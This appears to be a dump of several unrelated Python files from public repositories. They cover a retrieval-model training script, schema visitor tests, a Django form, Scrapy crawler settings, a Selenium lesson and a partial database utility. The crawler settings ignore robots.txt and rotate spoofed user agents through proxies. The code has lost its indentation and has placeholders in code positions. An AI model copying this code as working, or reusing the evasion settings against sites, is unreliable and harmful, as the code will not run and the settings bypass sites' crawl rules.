def save_vectors(args, ret_model, corpus, data_loader, verified_dev_loader=None, save_scores = True, train=False, test=False):
total_exs = 0
args.train_time = False
ret_model.model.eval()
para_vectors = {}
question_vectors = {}
for idx, ex in enumerate(tqdm(data_loader)):
if ex is None:
raise BrokenPipeError
inputs = [e if e is None or type(e) != type(ex[0]) else Variable(e.cuda(async=True))
for e in ex[:]]
ret_input = [*inputs[:4]]
total_exs += ex[0].size(0)
scores, doc, ques = ret_model.score_paras(*ret_input)
scores = scores.cpu().data.numpy()
scores = scores.reshape((-1))
if save_scores:
for i, pid in enumerate(ex[-1]):
para_vectors[pid] = doc[i]
for i, qid in enumerate([corpus.paragraphs[pid].qid for pid in ex[-1]]):
if qid not in question_vectors:
question_vectors[qid] = ques[i]
for i, pid in enumerate(ex[-1]):
corpus.paragraphs[pid].model_score = scores[i]
get_topk(corpus)
print_vectors(args, para_vectors, question_vectors, corpus, train, test)
def get_topk(corpus):
top1 = 0
top3 = 0
top5 = 0
for qid in corpus.questions:
para_scores = [(corpus.paragraphs[pid].model_score,corpus.paragraphs[pid].ans_occurance ) for pid in corpus.questions[qid].pids]
sorted_para_scores = sorted(para_scores, key=lambda x: x[0], reverse=True)
if sorted_para_scores[0][1] > 0:
top1 += 1
if sum([ans[1] for ans in sorted_para_scores[:3]]) > 0:
top3 += 1
if sum([ans[1] for ans in sorted_para_scores[:5]]) > 0:
top5 += 1
top1 = top1/len(corpus.questions)
top3 = top3/len(corpus.questions)
top5 = top5/len(corpus.questions)
logger.info('top1 = {}, top3 = {}, top5 = {} '.format(top1, top3 ,top5 ))
return top1
def get_topk_tfidf(corpus):
top1 = 0
top3 = 0
top5 = 0
for qid in corpus.questions:
para_scores = [(corpus.paragraphs[pid].tfidf_score, corpus.paragraphs[pid].ans_occurance) for pid in
corpus.questions[qid].pids]
sorted_para_scores = sorted(para_scores, key=lambda x: x[0])
# import pdb
# pdb.set_trace()
if sorted_para_scores[0][1] > 0:
top1 += 1
if sum([ans[1] for ans in sorted_para_scores[:3]]) > 0:
top3 += 1
if sum([ans[1] for ans in sorted_para_scores[:5]]) > 0:
top5 += 1
logger.info(
'top1 = {}, top3 = {}, top5 = {} '.format(top1 / len(corpus.questions), top3 / len(corpus.questions),
top5 / len(corpus.questions)))
def run_predictions(args, data_loader, model, eval_on_train_set=False):
args.train_time = False
top_1 = 0
top_3 = 0
top_5 = 0
total_num_questions = 0
map_counter = 0
cum_num_lens = []
qid2idx = {}
sum_num_paras = 0
all_correct_answers = {}
for ex_counter, ex in tqdm(enumerate(data_loader)):
ret_input = [*ex]
y_num_occurrences = ex[3]
labels = (y_num_occurrences > 0)
try:
topk_paras, docs, ques = model.return_topk(5,*ret_input)
except RuntimeError:
import pdb
pdb.set_trace()
num_paras = ex[1]
qids = ex[-1]
if args.save_para_clf_output:
docs = docs.cpu().data.numpy()
ques = ques.cpu().data.numpy()
if ex_counter == 0:
documents = docs
questions = ques
else:
documents = np.concatenate([documents, docs])
questions = np.concatenate([questions, ques])
### create map and cum_num_lens
for i, qid in enumerate(qids):
qid2idx[qid] = map_counter
sum_num_paras += num_paras[i]
cum_num_lens.append(sum_num_paras)
all_correct_answers[map_counter] = []
st = sum(num_paras[:i])
for j in range(num_paras[i]):
if labels[st+j] == 1:
all_correct_answers[map_counter].append(j)
### Test case:
assert len(all_correct_answers[map_counter]) == sum(labels.data.numpy()[st: st + num_paras[i]])
map_counter += 1
counter = 0
for q_counter, ranked_para_ids in enumerate(topk_paras):
total_num_questions += 1
for i, no_paras in enumerate(ranked_para_ids):
if labels[counter + no_paras ] ==1:
if i <= 4:
top_5 += 1
if i <= 2:
top_3 += 1
if i <= 0:
top_1 += 1
break
counter += num_paras[q_counter]
logger.info('Accuracy of para classifier when evaluated on the annotated dev set.')
logger.info('top-1: {:2.4f}, top-3: {:2.4f}, top-5: {:2.4f}'.format(
(top_1 * 1.0 / total_num_questions),
(top_3 * 1.0 / total_num_questions),
(top_5 * 1.0 / total_num_questions)))
## saving code
if args.save_para_clf_output:
if eval_on_train_set:
OUT_DIR = "/iesl/canvas/sdhuliawala/vectors_web/train/"
else:
OUT_DIR = "/iesl/canvas/sdhuliawala/vectors_web/dev/"
if not os.path.exists(OUT_DIR):
os.mkdir(OUT_DIR)
else:
shutil.rmtree(OUT_DIR, ignore_errors=True)
os.mkdir(OUT_DIR)
#Test cases
assert cum_num_lens[-1] == documents.shape[0]
assert questions.shape[0] == documents.shape[0]
assert len(cum_num_lens) == len(qid2idx)
assert len(cum_num_lens) == len(all_correct_answers)
json.dump(qid2idx, open(OUT_DIR + 'map.json', 'w'))
json.dump(all_correct_answers, open(OUT_DIR + 'correct_paras.json', 'w'))
all_cumlen = np.array(cum_num_lens)
np.save(OUT_DIR + "document", documents)
np.save(OUT_DIR + "question", questions)
np.save(OUT_DIR + "all_cumlen", all_cumlen)
return (top_1 * 1.0 / total_num_questions), (top_3 * 1.0 / total_num_questions), (top_5 * 1.0 / total_num_questions)
def save(args, model, optimizer, filename, epoch=None):
params = {
'state_dict': {
'para_clf': model.state_dict(),
'optimizer': optimizer.state_dict()
},
'word_dict': args.word_dict,
'feature_dict': args.feature_dict
}
args.word_dict = None
args.feature_dict = None
params['config'] = vars(args)
if epoch:
params['epoch'] = epoch
try:
torch.save(params, filename)
# bad hack for not saving dictionary twice
args.word_dict = params['word_dict']
args.feature_dict = params['feature_dict']
except BaseException:
logger.warn('[ WARN: Saving failed... continuing anyway. ]')
# ------------------------------------------------------------------------------
# Main.
# ------------------------------------------------------------------------------
def main(args):
# PRINT CONFIG
logger.info('-' * 100)
logger.info('CONFIG:\n%s' % json.dumps(vars(args), indent=4, sort_keys=True))
# small can't test
if args.small == 1:
args.test = 0
if args.small == 1:
args.train_file_name = args.train_file_name + "_small"
args.dev_file_name = args.dev_file_name + "_small"
if args.test == 1:
args.test_file_name = args.test_file_name + "_small"
args.train_file_name = args.train_file_name + ".pkl"
args.dev_file_name = args.dev_file_name + ".pkl"
if args.test == 1:
args.test_file_name = args.test_file_name + ".pkl"
logger.info("Loading pickle files")
fin = open(os.path.join(args.data_dir, args.src, "data", args.domain, args.train_file_name), "rb")
all_train_exs = pickle.load(fin)
fin.close()
fin = open(os.path.join(args.data_dir, args.src, "data", args.domain, args.dev_file_name), "rb")
all_dev_exs = pickle.load(fin)
fin.close()
if args.test == 1:
fin = open(os.path.join(args.data_dir, args.src, "data", args.domain, args.test_file_name), "rb")
all_test_exs = pickle.load(fin)
fin.close()
logger.info("Loading done!")
logger.info("Num train examples {}".format(len(all_train_exs.paragraphs)))
logger.info("Num dev examples {}".format(len(all_dev_exs.paragraphs)))
if args.test == 1:
logger.info("Num test examples {}".format(len(all_test_exs.paragraphs)))
if args.pretrained is None:
ret_model, optimizer, word_dict, feature_dict = init_from_scratch(args, all_train_exs)
else:
ret_model, optimizer, word_dict, feature_dict = init_from_checkpoint(args)
# make data loader
logger.info("Making data loaders...")
if word_dict == None:
args.word_dict = utils.build_word_dict(args, (all_train_exs, all_dev_exs))
word_dict = args.word_dict
train_loader = make_data_loader(args, all_train_exs, train_time=False) if args.eval_only else make_data_loader(args, all_train_exs, train_time=True)
dev_loader = make_data_loader(args, all_dev_exs)
if args.test:
test_loader = make_data_loader(args, all_test_exs)
if args.eval_only:
logger.info("Saving dev paragraph vectors")
save_vectors(args, ret_model, all_dev_exs, dev_loader, verified_dev_loader=None)
logger.info("Saving train paragraph vectors")
save_vectors(args, ret_model, all_train_exs, train_loader, verified_dev_loader=None, train=True)
if args.test:
args.is_test = 1
logger.info("Saving test paragraph vectors")
save_vectors(args, ret_model, all_test_exs, test_loader, verified_dev_loader=None)
else:
get_topk_tfidf(all_dev_exs)
for epoch in range(args.num_epochs):
stats['epoch'] = epoch
train_binary_classification(args, ret_model, optimizer, train_loader, verified_dev_loader=None)
logger.info('checkpointing model at {}'.format(args.model_file))
## check pointing##
save(args, ret_model.model, optimizer, args.model_file+".ckpt", epoch=stats['epoch'])
logger.info("Evaluating on the full dev set....")
top1 = eval_binary_classification(args, ret_model, all_dev_exs, dev_loader, verified_dev_loader=None)
if stats['best_acc'] < top1:
stats['best_acc'] = top1
logger.info('Best accuracy {}'.format(stats['best_acc']))
logger.info('Saving model at {}'.format(args.model_file))
logger.info("Logs saved at {}".format(args.log_file))
save(args, ret_model.model, optimizer, args.model_file, epoch=stats['epoch'])
if __name__ == '__main__':
# MODEL
logger.info('-' * 100)
# Parse cmdline args and setup environment
args = config.get_args()
# Set cuda
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.set_device(args.gpu)
# Set random state
np.random.seed(args.random_seed)
torch.manual_seed(args.random_seed)
if args.cuda:
torch.cuda.manual_seed(args.random_seed)
# Set logging
logger.setLevel(logging.INFO)
fmt = logging.Formatter('%(asctime)s: %(message)s', '%m/%d/%Y %I:%M:%S %p')
console = logging.StreamHandler()
console.setFormatter(fmt)
logger.addHandler(console)
if args.log_file:
if args.checkpoint:
logfile = logging.FileHandler(args.log_file, 'a')
else:
logfile = logging.FileHandler(args.log_file, 'w')
logfile.setFormatter(fmt)
logger.addHandler(logfile)
logger.info('[ COMMAND: %s ]' % ' '.join(sys.argv))
# Run!
main(args) |
orchestra/tests/workflows/test_dir/load_sample_data.py | code-review-doctor/orchestra | 444 | 12797174 | <reponame>code-review-doctor/orchestra
def load(workflow_version):
""" Dummy loading function. """
pass
|
tests/schema/test_visitor.py | mabrains/ALIGN-public | 119 | 12797262 | import pytest
from align.schema.types import BaseModel, Optional, List, Dict
from align.schema.visitor import Visitor, Transformer, cache
@pytest.fixture
def dummy():
class DummyModel(BaseModel):
arg1: str
arg2: Optional[str]
arg3: List[str]
arg4: List[Optional[str]]
arg5: Dict[str, str]
arg6: Dict[str, Optional[str]]
arg7: "Optional[DummyModel]"
arg8: "Optional[List[DummyModel]]"
DummyModel.update_forward_refs()
base = DummyModel(
arg1 = 'arg1',
arg3 = ['arg3_1', 'arg3_2'],
arg4 = [],
arg5 = {'arg5_k': 'arg5_v'},
arg6 = {'arg6_k': None}
)
dummy = DummyModel(
arg1 = 'arg1',
arg3 = ['arg3_1', 'arg3_2'],
arg4 = [],
arg5 = {'arg5_k': 'arg5_v'},
arg6 = {'arg6_k': None},
arg7 = base,
arg8 = [base, base]
)
return dummy
def test_visitor_no_output(dummy):
assert Visitor().visit(dummy) == []
def test_visitor_raw_output(dummy):
class StrValVisitor(Visitor):
def visit_str(self, node):
return node
assert StrValVisitor().visit(dummy) == [
'arg1',
'arg3_1',
'arg3_2',
'arg5_v',
'arg1',
'arg3_1',
'arg3_2',
'arg5_v',
'arg1',
'arg3_1',
'arg3_2',
'arg5_v',
'arg1',
'arg3_1',
'arg3_2',
'arg5_v',
]
def test_visitor_processed_output(dummy):
class DummyCounter(Visitor):
'''Simply counts the number of times the dummy class is encountered'''
def visit_DummyModel(self, node):
return sum(self.generic_visit(node)) + 1
assert DummyCounter().visit(dummy) == 4
def test_transformer_no_visitor(dummy):
assert Transformer().visit(dummy.arg1) is dummy.arg1
assert Transformer().visit(dummy.arg2) is dummy.arg2
assert Transformer().visit(dummy.arg3) is dummy.arg3
assert Transformer().visit(dummy.arg4) is dummy.arg4
assert Transformer().visit(dummy.arg5) is dummy.arg5
assert Transformer().visit(dummy.arg6) is dummy.arg6
assert Transformer().visit(dummy.arg7) is dummy.arg7
assert Transformer().visit(dummy.arg8) is dummy.arg8
assert Transformer().visit(dummy) is dummy
def test_transformer_string_visitor(dummy):
class AddStringPrefix(Transformer):
def visit_str(self, node):
return 'prefix_' + node
transformed = AddStringPrefix().visit(dummy)
assert isinstance(transformed, dummy.__class__)
# String in subtree
assert transformed.arg1 == 'prefix_arg1'
assert transformed.arg1 is not dummy.arg1
# No string in subtree
assert transformed.arg2 == None
assert transformed.arg2 is dummy.arg2
# String in subtree
assert transformed.arg3 == ['prefix_arg3_1', 'prefix_arg3_2']
assert transformed.arg3 is not dummy.arg3
# No string in subtree
assert transformed.arg4 == []
assert transformed.arg4 is dummy.arg4, f'old:({id(dummy.arg4)}, {dummy.arg4}), new:({id(transformed.arg4)}, {transformed.arg4})'
# String in subtree
assert transformed.arg5 == {'arg5_k': 'prefix_arg5_v'}
assert transformed.arg5 is not dummy.arg5
# No string in subtree
assert transformed.arg6 == {'arg6_k': None}
assert transformed.arg6 is dummy.arg6
# Expected result for arg7 and arg8
basedict = {'arg1': 'prefix_arg1',
'arg2': None,
'arg3': ['prefix_arg3_1',
'prefix_arg3_2'],
'arg4': [],
'arg5': {'arg5_k': 'prefix_arg5_v'},
'arg6': {'arg6_k': None},
'arg7': None,
'arg8': None}
# String in subtree
assert transformed.arg7 == basedict
assert transformed.arg7 is not dummy.arg7
# String in subtree
assert transformed.arg8 == [basedict, basedict]
assert transformed.arg8 is not dummy.arg8
# Ensure cache is working for generic_visitor
assert transformed.arg7 is transformed.arg8[0]
assert transformed.arg8[0] is transformed.arg8[1]
def test_cache(dummy):
class UncachedTransformer(Transformer):
def visit_DummyModel(self, node):
if not hasattr(self, 'top'):
self.top = node
return self.generic_visit(node)
else:
return node.copy()
control = UncachedTransformer().visit(dummy)
assert control.arg7 is not control.arg8[0]
assert control.arg8[0] is not control.arg8[1]
class CachedTransformer(Transformer):
@cache # DO THIS FOR MOST VISITORS
def visit_DummyModel(self, node):
if not hasattr(self, 'top'):
self.top = node
return self.generic_visit(node)
else:
return node.copy()
transformed = CachedTransformer().visit(dummy)
assert transformed.arg7 is transformed.arg8[0]
assert transformed.arg8[0] is transformed.arg8[1]
|
djangoerp/registration/forms.py | xarala221/django-erp | 345 | 12797325 | <filename>djangoerp/registration/forms.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""This file is part of the django ERP project.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2013-2015, django ERP Team'
__version__ = '0.0.5'
from django import forms
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from djangoerp.core.forms.auth import UserForm
class UserRegistrationForm(UserForm):
"""Form for user registration.
"""
def __init__(self, *args, **kwargs):
super(UserRegistrationForm, self).__init__(*args, **kwargs)
# Improved security.
if hasattr(self.fields, 'is_admin'): self.fields.pop('is_admin')
if hasattr(self.fields, 'is_staff'): self.fields.pop('is_staff')
if hasattr(self.fields, 'is_active'): self.fields.pop('is_active')
if hasattr(self.fields, 'is_superuser'): self.fields.pop('is_superuser')
if hasattr(self.fields, 'groups'): self.fields.pop('groups')
if hasattr(self.fields, 'user_permissions'): self.fields.pop('user_permissions')
|
mpunet/errors/deprecated_warnings.py | alexsosn/MultiPlanarUNet | 156 | 12797402 | from mpunet.logging import ScreenLogger
def warn_sparse_param(logger):
logger = logger or ScreenLogger
sparse_err = "mpunet 0.1.3 or higher requires integer targets" \
" as opposed to one-hot encoded targets. Setting the 'sparse'" \
" parameter no longer has any effect and may not be allowed" \
" in future versions."
logger.warn(sparse_err)
|
crawler/house_renting/settings.py | bernssolg/house-renting-master | 823 | 12797482 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from house_renting.spider_settings import lianjia, a58
BOT_NAME = 'house_renting'
COMMANDS_MODULE = 'house_renting.commands'
SPIDER_MODULES = ['house_renting.spiders']
NEWSPIDER_MODULE = 'house_renting.spiders'
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \
'Safari/605.1.15 '
USER_AGENTS = (
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; '
'.NET CLR 3.0.04506)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR '
'2.0.50727)',
'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR '
'3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; '
'.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR '
'3.0.04506.30)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 ('
'Change: 287 c9dfb30)',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0',
'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 '
'Safari/535.20',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 '
'Safari/605.1.15',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52',
)
ROBOTSTXT_OBEY = False
DOWNLOAD_DELAY = 10
CONCURRENT_REQUESTS_PER_DOMAIN = 1
COOKIES_ENABLED = False
TELNETCONSOLE_ENABLED = False
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
}
SPIDER_MIDDLEWARES = {
}
DOWNLOADER_MIDDLEWARES = {
'house_renting.middlewares.HouseRentingAgentMiddleware': 100,
'house_renting.middlewares.HouseRentingProxyMiddleware': 200,
'house_renting.middlewares.HouseRentingRetryMiddleware': 300,
'scrapy.downloadermiddlewares.retry.RetryMiddleware': None,
'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,
}
ITEM_PIPELINES = {
'house_renting.pipelines.HouseRentingPipeline': 100,
'house_renting.pipelines.DuplicatesPipeline': 200,
'scrapy.pipelines.images.ImagesPipeline': 300,
'house_renting.pipelines.ESPipeline': 400,
}
IMAGES_STORE = '/house-renting/data/images'
MEDIA_ALLOW_REDIRECTS = True
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
AUTOTHROTTLE_ENABLED = True
# The initial download delay
AUTOTHROTTLE_START_DELAY = 10
# The maximum download delay to be set in case of high latencies
AUTOTHROTTLE_MAX_DELAY = 10
# The average number of requests Scrapy should be sending in parallel to
# each remote server
AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0
# Enable showing throttling stats for every response received:
AUTOTHROTTLE_DEBUG = True
DOWNLOAD_TIMEOUT = 30
RETRY_TIMES = 3
LOG_LEVEL = 'INFO'
SPIDER_SETTINGS = {
'lianjia': {
'cities': lianjia.cities,
'available_cities': lianjia.available_cities,
'available_cities_map': lianjia.available_cities_map,
},
'58': {
'cities': a58.cities,
'available_cities': a58.available_cities,
'available_cities_map': a58.available_cities_map,
},
}
# ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES
ELASTIC_HOSTS = [
{'host': 'elastic', 'port': 9200},
]
REDIS_HOST = 'redis' # 默认为 None, 不会去重
REDIS_PORT = 6379 # 默认 6379
|
codigo_das_aulas/aula_10/aula_10_08.py | VeirichR/curso-python-selenium | 234 | 12797499 | <reponame>VeirichR/curso-python-selenium<filename>codigo_das_aulas/aula_10/aula_10_08.py
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import (
url_contains,
url_matches
)
url = 'https://selenium.dunossauro.live/aula_10_c.html'
browser = Firefox()
browser.get(url)
wdw = WebDriverWait(browser, 10)
links = browser.find_elements_by_css_selector('.body_b a')
links[1].click()
wdw.until(
url_contains('selenium'),
)
wdw.until(
url_matches('http.*live'),
)
|
IronManFly/storage/db/db.py | leepand/IronManFly | 599 | 12797505 | <filename>IronManFly/storage/db/db.py
import threading
import glob
import gzip
try:
from StringIO import StringIO # Python 2.7
except:
from io import StringIO # Python 3.3+
import uuid
import re
import os
import sys
from collections import defaultdict
import pandas as pd
import pybars
from .column import Column, ColumnSet
from .table import Table, TableSet
from .s3 import S3
from .utils import profile_path, load_profile, load_from_json, dump_to_json
from .query_templates import query_templates
# attempt to import the relevant database libraries
# TODO: maybe add warnings?
try:
import psycopg2 as pg
HAS_PG = True
except ImportError:
HAS_PG = False
try:
import MySQLdb
mysql_connect = MySQLdb.connect
HAS_MYSQL = True
except ImportError:
try:
import pymysql
mysql_connect = pymysql.connect
HAS_MYSQL = True
except ImportError:
HAS_MYSQL = False
try:
import sqlite3 as sqlite
HAS_SQLITE = True
except ImportError:
HAS_SQLITE = False
try:
import pyodbc as pyo
HAS_ODBC = True
except ImportError:
try:
import pypyodbc as pyo
HAS_ODBC = True
except ImportError:
HAS_ODBC = False
try:
import pymssql
HAS_PYMSSQL = True
except ImportError:
HAS_PYMSSQL = False
DBPY_PROFILE_ID = ".db.py_"
S3_PROFILE_ID = ".db.py_s3_"
class DB(object):
"""
Utility for exploring and querying a database.
Parameters
----------
username: str
Your username for the database
password: str
Your password for the database
hostname: str
Hostname your database is running on (i.e. "localhost", "10.20.1.248")
port: int
Port the database is running on. defaults to default port for db.
portgres: 5432
redshift: 5439
mysql: 3306
sqlite: n/a
mssql: 1433
filename: str
path to sqlite database
dbname: str
Name of the database
schemas: list
List of schemas to include. Defaults to all.
profile: str
Preconfigured database credentials / profile for how you like your queries
exclude_system_tables: bool
Whether or not to include "system" tables (the ones that the database needs
in order to operate). This includes things like schema definitions. Most of
you probably don't need this, but if you're a db admin you might actually
want to query the system tables.
limit: int, None
Default number of records to return in a query. This is used by the DB.query
method. You can override it by adding limit={X} to the `query` method, or
by passing an argument to `DB()`. None indicates that there will be no
limit (That's right, you'll be limitless. Bradley Cooper style.)
keys_per_column: int, None
Default number of keys to display in the foreign and reference keys.
This is used to control the rendering of PrettyTable a bit. None means
that you'll have verrrrrrrry wide columns in some cases.
driver: str, None
Driver for mssql/pyodbc connections.
Examples
--------
db = DB(dbname="AdventureWorks2012", dbtype="mssql", driver="{FreeTDS}")
from db import DB
try:
__import__('imp').find_module('psycopg2')
db = DB(username="kermit", password="<PASSWORD>", hostname="themuppets.com", port=5432, dbname="muppets", dbtype="postgres")
db = DB(username="dev", hostname="localhost", port=5432, dbname="devdb", dbtype="postgres")
db = DB(username="fozzybear", password="<PASSWORD>", hostname="ec2.523.24.131", port=5432, dbname="muppets_redshift", dbtype="redshift")
except ImportError:
pass
try:
__import__('imp').find_module('pymysql')
db = DB(username="root", hostname="localhost", dbname="employees", dbtype="mysql")
db = DB(filename="/path/to/mydb.sqlite", dbtype="sqlite")
except ImportError:
pass
"""
def __init__(self, username=None, password=<PASSWORD>, hostname="localhost",
port=None, filename=None, dbname=None, dbtype=None, schemas=None,
profile="default", exclude_system_tables=True, limit=1000,
keys_per_column=None, driver=None, cache=False):
if port is None:
if dbtype=="postgres":
port = 5432
elif dbtype=="redshift":
port = 5439
elif dbtype=="mysql":
port = 3306
elif dbtype=="sqlite":
port = None
elif dbtype=="mssql":
port = 1433
elif profile is not None:
pass
else:
raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift")
self._use_cache = cache
if dbtype not in ("sqlite", "mssql") and username is None:
self.load_credentials(profile)
if cache:
self._metadata_cache = self.load_metadata(profile)
elif dbtype=="sqlite" and filename is None:
self.load_credentials(profile)
if cache:
self._metadata_cache = self.load_metadata(profile)
else:
self.username = username
self.password = password
self.hostname = hostname
self.port = port
self.filename = filename
self.dbname = dbname
self.dbtype = dbtype
self.schemas = schemas
self.limit = limit
self.keys_per_column = keys_per_column
self.driver = driver
if self.dbtype is None:
raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift")
self._query_templates = query_templates.get(self.dbtype).queries
if self.dbtype=="postgres" or self.dbtype=="redshift":
if not HAS_PG:
raise Exception("Couldn't find psycopg2 library. Please ensure it is installed")
self.con = pg.connect(user=self.username, password=self.password,
host=self.hostname, port=self.port, dbname=self.dbname)
self.con.autocommit = True
self.cur = self.con.cursor()
elif self.dbtype=="sqlite":
if not HAS_SQLITE:
raise Exception("Couldn't find sqlite library. Please ensure it is installed")
self.con = sqlite.connect(self.filename)
self.cur = self.con.cursor()
self._create_sqlite_metatable()
elif self.dbtype=="mysql":
if not HAS_MYSQL:
raise Exception("Couldn't find MySQLdb or pymysql library. Please ensure it is installed")
creds = {}
for arg in ["username", "password", "hostname", "port", "dbname"]:
if getattr(self, arg):
value = getattr(self, arg)
if arg=="username":
arg = "user"
elif arg=="password":
arg = "<PASSWORD>"
elif arg=="dbname":
arg = "db"
elif arg=="hostname":
arg = "host"
creds[arg] = value
self.con = mysql_connect(**creds)
self.con.autocommit(True)
self.cur = self.con.cursor()
elif self.dbtype=="mssql":
if not HAS_ODBC and not HAS_PYMSSQL:
raise Exception("Couldn't find pyodbc or pymssql libraries. Please ensure one of them is installed")
if HAS_ODBC:
base_con = "Driver={driver};Server={server};Database={database};".format(
driver=self.driver or "SQL Server",
server=self.hostname or "localhost",
database=self.dbname or ''
)
conn_str = ((self.username and self.password) and "{}{}".format(
base_con,
"User Id={username};Password={password};".format(
username=self.username,
password=self.password
)
) or "{}{}".format(base_con, "Trusted_Connection=Yes;"))
try:
self.con = pyo.connect(conn_str)
self.cur = self.con.cursor()
except:
self.con = pyo.connect(
driver=self.driver or "SQL Server",
server=self.hostname or "localhost",
port=self.port,
database=self.dbname or '',
uid=self.username,
pwd=<PASSWORD>)
self.cur = self.con.cursor()
elif HAS_PYMSSQL:
if '\\' in self.hostname:
hostname = self.hostname
elif hasattr(self, 'port'):
hostname = '{0}:{1}'.format(self.hostname, self.port)
else:
hostname = self.hostname
self.con = pymssql.connect(host=hostname,
user=self.username,
password=<PASSWORD>,
database=self.dbname)
self.cur = self.con.cursor()
self._tables = TableSet([])
self._exclude_system_tables = exclude_system_tables
self.handlebars = pybars.Compiler()
@property
def tables(self):
"""A lazy loaded reference to the table metadata for the DB."""
if len(self._tables) == 0:
self.refresh_schema(self._exclude_system_tables, self._use_cache)
return self._tables
def __str__(self):
return "DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}".format(
dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname)
def __repr__(self):
return self.__str__()
def __delete__(self):
del self.cur
del self.con
def load_credentials(self, profile="default"):
"""
Loads crentials for a given profile. Profiles are stored in
~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not
to say this a secure way to store sensitive data, but it will probably
stop your little sister from stealing your passwords.
Parameters
----------
profile: str
(optional) identifier/name for your database (i.e. "dw", "prod")
"""
f = profile_path(DBPY_PROFILE_ID, profile)
if f:
creds = load_from_json(f)
self.username = creds.get('username')
self.password = creds.get('password')
self.hostname = creds.get('hostname')
self.port = creds.get('port')
self.filename = creds.get('filename')
self.dbname = creds.get('dbname')
self.dbtype = creds.get('dbtype')
self.schemas = creds.get('schemas')
self.limit = creds.get('limit')
self.keys_per_column = creds.get('keys_per_column')
else:
raise Exception("Credentials not configured!")
def save_credentials(self, profile="default"):
"""
Save your database credentials so you don't have to save them in script.
Parameters
----------
profile: str
(optional) identifier/name for your database (i.e. "dw", "prod")
from db import DB
import pymysql
db = DB(username="hank", password="<PASSWORD>", hostname="prod.mardukas.com", dbname="bar", dbtype="mysql")
db.save_credentials(profile="production")
db = DB(username="hank", password="<PASSWORD>", hostname="staging.mardukas.com", dbname="bar", dbtype="mysql")
db.save_credentials(profile="staging")
db = DB(profile="staging")
>>> from db import DemoDB
>>> db = DemoDB()
>>> db.save_credentials(profile='test')
"""
f = profile_path(DBPY_PROFILE_ID, profile)
dump_to_json(f, self.credentials)
@staticmethod
def load_metadata(profile="default"):
f = profile_path(DBPY_PROFILE_ID, profile)
if f:
prof = load_from_json(f)
return prof.get('tables', None)
def save_metadata(self, profile="default"):
"""Save the database credentials, plus the database properties to your db.py profile."""
if len(self.tables) > 0:
